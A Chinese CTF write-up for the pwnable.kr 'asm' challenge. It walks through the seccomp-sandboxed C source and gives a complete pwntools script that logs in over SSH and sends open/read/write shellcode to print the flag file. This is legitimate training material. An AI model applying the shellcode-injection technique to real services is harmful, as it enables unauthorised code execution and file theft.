这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。
首先看看这道题目的代码:
复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | | |__| || / || | | / _] | |/ ]| | o ) | | || _ || o || o )| | / [_ | ' / | D ) | _/| | | || | || || || |___ | _] | | / | | | ` ' || | || _ || O || || [_ __ | | | | / | | || | || || || || || . || . |__| _/_/ |__|__||__|__||_____||_____||_____||__||__|_||__|_| - Site admin : daehee87.kr@gmail.com - IRC : irc.netgarage.org:6667 / #pwnable.kr - Simply type "irssi" command to join IRC now - files under /tmp can be erased anytime. make your directory under /tmp - to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal Last login: Sun Jul 22 23:03:43 2018 from 180.139.99.191 asm@ubuntu:~$ ls -al total 48 drwxr-x--- 5 root asm 4096 Jan 2 2017 . drwxr-xr-x 87 root root 4096 Dec 27 2017 .. d--------- 2 root root 4096 Nov 19 2016 .bash_history dr-xr-xr-x 2 root root 4096 Nov 25 2016 .irssi drwxr-xr-x 2 root root 4096 Jan 2 2017 .pwntools-cache -rwxr-xr-x 1 root root 13704 Nov 29 2016 asm -rw-r--r-- 1 root root 1793 Nov 29 2016 asm.c -rw-r--r-- 1 root root 211 Nov 19 2016 readme -rw-r--r-- 1 root root 67 Nov 19 2016 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong asm@ubuntu:~$ cat asm.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp errorn"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp errorn"); exit(0); } seccomp_release(ctx); } char stub[] = "x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.n"); printf("If this does not challenge you. you should play 'asg' challenge :)n"); char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }
接下来看到了char stub[ ]中明显的shellcode型的格式,运用python查看:
复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38root@kali:~# python Python 2.7.13 (default, Jan 19 2017, 14:48:08) [GCC 6.3.0 20170118] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> from pwn import * >>> print disasm("x48x31xc0x48x31xdbx48x31xc9x48x31xd2x48x31xf6x48x31xffx48x31xedx4dx31xc0x4dx31xc9x4dx31xd2x4dx31xdbx4dx31xe4x4dx31xedx4dx31xf6x4dx31xff") 0: 48 dec eax 1: 31 c0 xor eax,eax 3: 48 dec eax 4: 31 db xor ebx,ebx 6: 48 dec eax 7: 31 c9 xor ecx,ecx 9: 48 dec eax a: 31 d2 xor edx,edx c: 48 dec eax d: 31 f6 xor esi,esi f: 48 dec eax 10: 31 ff xor edi,edi 12: 48 dec eax 13: 31 ed xor ebp,ebp 15: 4d dec ebp 16: 31 c0 xor eax,eax 18: 4d dec ebp 19: 31 c9 xor ecx,ecx 1b: 4d dec ebp 1c: 31 d2 xor edx,edx 1e: 4d dec ebp 1f: 31 db xor ebx,ebx 21: 4d dec ebp 22: 31 e4 xor esp,esp 24: 4d dec ebp 25: 31 ed xor ebp,ebp 27: 4d dec ebp 28: 31 f6 xor esi,esi 2a: 4d dec ebp 2b: 31 ff xor edi,edi >>>
看懂这段代码需要一定的汇编基础,理解这段代码可以知道这段code的作用就是清空了所有寄存器,所以这对我们执行shellcode并没有什么影响,可以不用考虑。
接下来说说沙箱中能使用的函数,由于沙箱限制了很多函数的使用,所以沙箱中,只能使用read、write、open、exit这四个函数,所以这题的思路就是用open函数打开flag,用read函数读取flag,用write来写进stdout(当然还有一点,题目给的hint一定要注意看,这个往往就是题目给的提示,或者解决题目的端口环境等等,在其他的CTF题目中,当然也有一定的提示的,所以hint一定要看,不看虽然题目可能可以做出来,但是看了hint题目一定可以快速地解答出来,扯远了。。。回来)。
还是直接给出脚本再进一步分析:
复制代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19#!/user/bin/python from pwn import * con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222) p = con.connect_remote('localhost', 9026) context(arch='amd64', os='linux') shellcode = "" shellcode += shellcraft.open('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong') shellcode += shellcraft.read('rax', 'rsp', 100) shellcode += shellcraft.write(1, 'rsp', 100) #print shellcode print p.recv() p.send(asm(shellcode)) print p.recvline()
做了那么多题目了,一二两部分肯定不用解释了吧,有人可能会问怎么发现remote的端口还有用户名的,其实这个就是在readme这里面有的,这就是一个hint;
第三部分就是shellcode了,这个还是难点,首先之前说的flag的目录在this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong这里,所以直接open就好了;read函数是读取rax中的个字节到rsp中,write函数可以参照linux下0--->stdin,1--->stdout,2--->stderr.write(1,'rsp',100)相当于将缓冲区中的内容输出;
之后的几部分就可以很好的理解了,所以这题也就解决了,recv()、receline()这几个函数不理解的可以去百度。
最后
以上就是欢呼钢笔最近收集整理的关于pwnable.kr之asm的全部内容,更多相关pwnable内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复